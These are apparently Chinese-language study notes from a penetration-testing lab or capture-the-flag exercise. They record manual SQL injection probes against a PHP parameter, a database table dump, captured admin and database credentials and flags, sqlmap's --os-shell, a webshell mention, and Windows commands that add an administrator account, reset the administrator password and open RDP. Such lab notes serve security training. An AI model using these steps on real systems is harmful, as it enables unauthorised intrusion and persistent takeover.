学习笔记
1.13日
漏洞挖掘及渗透项目实战
留言可以上传?
搜索
思路:
1.网站语言php
2.可能存在sql注入漏洞呢?get方法
3.我想找到后台
判断页面是否存在sql注入的手工判断方法
构造payload的方法如下:
http://192.168.7.49/product.php?cid=3
$cid=get[id];
select * from tables where id=3 or 1=1; = select * from tables;
’ url编码 %27
cid=3’ 异常
cid=3 and 1=1 正常
cid=3 and 1=2 异常
这个地方一定存在sql注入
找到了sql注入漏洞:第一步就是拿数据
information_schema //mysql5.0以上版本。默认存在的一个数据库
510_admin |
| 510_config |
| 510_flag |
| 510_messages |
| 510_newbase |
| 510_newsclass |
| 510_newscontent |
| 510_proclass |
| 510_procut |
| 510_single |
| 510_weblink
管理员的登录账户和密码:
admin
adminlwphp
flag3{d3eac3a68b7d3863cc7bd45ba948195d}
网站的物理路径:
C:/WWW/
sqlmap 功能 --os-shell
这个功能有限,只有在网站权限在root权限时才能有用。
sqlmap.py -u 路径 --os-shell
账户的权限:
guest用户权限
user普通用户权限
administrators管理员权限
system系统权限
guest<user<administrators<system
一句话木马—菜刀—巴西烤肉
flag2{981c05134c56092b83b3e9c9b4116ac1}
whoami //查看当权权限
网站存在sql注入漏洞,我们能够利用注入漏洞拿到系统shell
$mydbuser=“root”;
$mydbpw =“windpasssql”;
添加用户,把用户添加进管理员组,开启3389端口
net user hacker 123456 /add
net localgroup Administrators hacker /add
需要管理员的账户和密码:
net user administrator 123456